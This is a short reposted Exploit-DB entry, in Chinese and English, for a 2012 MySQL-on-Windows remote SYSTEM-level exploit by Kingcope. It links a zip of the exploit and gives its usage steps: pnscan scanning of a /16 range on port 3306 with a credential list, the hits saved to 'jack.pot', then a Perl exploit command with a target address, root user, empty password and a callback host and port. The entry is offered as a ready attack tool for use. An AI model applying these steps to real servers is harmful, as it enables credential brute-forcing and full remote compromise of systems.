MySQL 的 Windows 远程系统级漏洞(Stuxnet 病毒采用的技术)。MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day。MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit。

EDB-ID: 23083

CVE: N/A

OSVDB-ID: N/A

Author: Kingcope

Published: 2012-12-02

MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit
Version 1.0
By Kingcope
In the Year of 2012

http://www.exploit-db.com/sploits/23083.zip

use this on a fast scan server!

How to use.
pnscan:

the file "accounts" holds the user/password combinations to try.
hits are saved in the file "jack.pot".

#make lnx
#./pnscan 192.168.0.0/16 3306

exploit:
#perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555

user root on windows will mostly succeed.

/Kingcope

Download:

23083.zip (mysql_win_remote_stuxnet_technique)

From: http://www.exploit-db.com/exploits/23083/

相关内容:

About Mysql 的那个提权漏洞